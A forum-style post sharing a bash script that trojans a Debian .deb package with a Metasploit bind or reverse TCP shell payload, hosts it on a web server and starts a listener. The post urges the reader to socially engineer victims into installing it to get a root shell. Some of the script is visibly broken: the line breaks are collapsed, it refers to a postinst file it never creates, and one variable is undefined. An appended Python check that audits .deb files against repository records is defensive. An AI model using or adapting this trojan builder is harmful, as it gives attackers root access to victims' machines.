A nice script that creates a backdoor for Debian systems and distributions that use .deb packaging, relying on the Metasploit project, with great ease.
Code:
#!/bin/bash
# bash script to generate a Debian (.deb) package trojan using Metasploit payload
# Author: Aaron Hine - @redmeat_uk
# Date: 31-01-2010
# Disclaimer: this script should be used for educational purposes. You should obtain permission before running this against an individual or company.
# The author is not liable for any illegal use of this script.
scriptname=`basename "$0"`
if [[ $UID -ne 0 ]]; then echo "${scriptname} must be run as root" exit 1 fi
# echo echo "#####################################################################" echo "Script to generate a Debian package trojan using a Metasploit payload" echo "#####################################################################" echo
# change these vars to suit your needs msfdir="/opt/metasploit3/msf3" tmpdir="/tmp/evildeb" workdir="$tmpdir/work"
# prompt for package name and setup dirs echo "Please enter the name of the APT package you wish to trojan:" echo "Use apt-cache search <package> for ideas :)" echo read package apt-get --download-only install $package echo mkdir $tmpdir mkdir $workdir mv /var/cache/apt/archives/$package* $tmpdir mkdir $workdir/DEBIAN dpkg -x $tmpdir/$package* $workdir apt-cache show $package > $workdir/DEBIAN/control cat $workdir/DEBIAN/control | sed '/^Original-Maintainer/d' | sed '/^SHA/d' > $workdir/DEBIAN/control2 mv $workdir/DEBIAN/control2 $workdir/DEBIAN/control echo echo "Please choose your Metasploit payload" echo "-------------------------------------" echo echo "1. bind tcp" echo "2. reverse tcp" echo echo "press number and hit return:" read choice
if [ "$choice" -eq 1 ]; then payload="linux/x86/shell/bind_tcp" echo "Enter IP:" read rhostIP echo "Enter port:" read bindport options="RHOST=$rhostIP LPORT=$bindport" else if [ "$choice" -eq 2 ]; then payload="linux/x86/shell/reverse_tcp" echo "Enter IP:" read lhostIP echo "Enter port:" read revport options="LHOST=$lhostIP LPORT=$revport" fi fi
echo echo "Please enter the filename for the Metasploit payload:" read filename echo
cd $workdir binary=`find . -executable -type f | grep $package | sed -e 's/^.//'` trojan="$filename"
echo "Thanks - generating your payload..." $msfdir/msfpayload $payload $options X > $workdir/$trojan2 echo
cd $workdir/DEBIAN chmod 755 postinst dpkg-deb --build $workdir cd $tmpdir
echo echo "Please enter your webroot directory:" read webroot mv $tmpdir/work.deb $webroot/$package.deb rm -rf $tmpdir
echo echo "Trojan'd $package.deb created and placed in $webroot" echo
webserver="python -m SimpleHTTPServer 80"
echo "Would you like a Python webserver ? (y/n) :" read svr echo
if [[ "$svr" == "y" || "$svr" == "Y" ]]; then cd $webroot $webserver & echo else echo "Fair nuff, setup your own webserver :)" echo fi
sleep 1
echo "Would you like me to setup a metasploit handler ? (y/n) :" echo read handler echo echo "In the meantime, social engineer your victim in to browsing to your package" echo "and get them to install it and wait for your root shell >)" echo
if [[ "$handler" == "y" || "$handler" == "Y" ]]; then echo $msfdir/msfcli exploit/multi/handler payload=$payload $options E else echo "Fair nuff, setup your own handler :)" echo fi
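A package rebuilt the way the script above does it no longer matches the repository's record for that package, and its control area carries a maintainer script. The following Python check is an added defensive example, not part of the original post: it compares a downloaded .deb with an `apt-cache show` record and lists the maintainer scripts to review. The function names and the sample archive are constructed for illustration.

```python
import hashlib, io, tarfile

SCRIPTS = {"preinst", "postinst", "prerm", "postrm"}  # run as root by dpkg

def ar_members(deb: bytes):
    """Yield (name, data) for each member of the ar archive that a .deb is."""
    if deb[:8] != b"!<arch>\n":
        raise ValueError("not an ar archive")
    pos = 8
    while pos + 60 <= len(deb):                     # fixed 60-byte member header
        name = deb[pos:pos + 16].decode().strip().rstrip("/")
        size = int(deb[pos + 48:pos + 58].decode().strip())
        yield name, deb[pos + 60:pos + 60 + size]
        pos += 60 + size + (size & 1)               # members are 2-byte aligned

def index_fields(stanza: str) -> dict:
    """Parse the 'Key: value' lines of an `apt-cache show` record."""
    return dict(l.split(": ", 1) for l in stanza.splitlines()
                if ": " in l and not l.startswith(" "))

def audit_deb(deb: bytes, stanza: str) -> list:
    """Compare a .deb with its repository record and list its maintainer scripts."""
    idx, findings = index_fields(stanza), []
    if hashlib.sha256(deb).hexdigest() != idx.get("SHA256"):
        findings.append("sha256-mismatch")
    if str(len(deb)) != idx.get("Size"):
        findings.append("size-mismatch")
    for name, data in ar_members(deb):
        if name.startswith("control.tar"):          # gz/xz/bz2; zstd depends on Python version
            with tarfile.open(fileobj=io.BytesIO(data)) as tar:
                names = {n.lstrip("./") for n in tar.getnames()}
            findings += sorted("maintainer-script:" + n for n in names & SCRIPTS)
    return findings

def build_sample_deb(scripts: dict) -> bytes:
    """Constructed sample input: a minimal .deb-shaped archive, control member only."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, body in {"control": b"Package: demo\n", **scripts}.items():
            info = tarfile.TarInfo("./" + name)
            info.size = len(body)
            tar.addfile(info, io.BytesIO(body))
    out = b"!<arch>\n"
    for name, data in (("debian-binary", b"2.0\n"), ("control.tar.gz", buf.getvalue())):
        out += f"{name:<16}{0:<12}{0:<6}{0:<6}{'100644':<8}{len(data):<10}`\n".encode()
        out += data + b"\n" * (len(data) & 1)
    return out
```

Call `audit_deb(open(path, "rb").read(), stanza)` with `stanza` taken from `apt-cache show <package>` on a trusted system, never from the file being checked. Many legitimate packages ship maintainer scripts, so those findings are items to read, while a hash or size mismatch means the file is not the one the repository published.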